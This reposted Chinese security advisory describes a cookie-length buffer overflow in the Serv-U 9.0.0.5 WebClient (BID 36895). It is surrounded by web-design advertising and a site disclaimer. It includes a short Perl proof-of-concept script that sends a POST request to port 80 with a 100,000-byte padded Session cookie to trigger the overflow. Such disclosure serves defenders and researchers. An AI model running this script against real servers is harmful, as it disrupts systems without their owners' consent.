Serv-U Web客户端HTTP请求远程溢出漏洞
成都创新互联-专业网站定制、快速模板网站建设、高性价比凉城网站开发、企业建站全套包干低至880元,成熟完善的模板库,直接使用。一站式凉城网站制作公司更省心,省钱,快速模板网站建设找我们,业务覆盖凉城地区。费用合理售后完善,10年实体公司更值得信赖。
影响版本:
RhinoSoft Serv-U 9.0.0.5
漏洞描述:
BUGTRAQ ID: 36895
Serv-U FTP是一款FTP服务程序。
Serv-U产品捆绑有一个简单的基于浏览器的传输客户端,这个客户端在处理超长的会话Cookie时存在缓冲区溢出漏洞。如果用户受骗连接到了恶意服务器并向WebClient HTTP服务返回了超长的会话Cookie,就可能触发这个溢出,导致在用户机器上执行任意指令。
---snip--- use IO::Socket; $|=1; $a = "A" x 100000; my $sock = IO::Socket::INET->new(PeerAddr => $ARGV[0], PeerPort => '80', Proto => 'tcp'); print $sock "POST / HTTP/1.1\r\n" ."Host: $ARGV[0]\r\n" ."Cookie: killmenothing; SULang=de%2CDE; themename=vista; Session=_ d838591b3a6257b0111138e6ca76c2c2409fb287b1473aa463db7f202caa09361bd7f8948c8d1adf4bd4f6c1c198eb9507545814 06246bf8$a\r\n" ."Content-Type: multipart/form-data; boundary=---------------------------25249352331758\r\n" ."Content-Length: 0\r\n\r\n"; while (<$sock>) { print; } ---snip--- |
新闻标题:Serv-UWeb客户端HTTP请求远程溢出漏洞
文章网址:http://www.shufengxianlan.com/qtweb/news16/189816.html
网站建设、网络推广公司-创新互联,是专注品牌与效果的网站制作,网络营销seo公司;服务项目有等
声明:本网站发布的内容(图片、视频和文字)以用户投稿、用户转载内容为主,如果涉及侵权请尽快告知,我们将会在第一时间删除。文章观点不代表本网站立场,如需处理请联系客服。电话:028-86922220;邮箱:631063699@qq.com。内容未经允许不得转载,或转载时需注明来源: 创新互联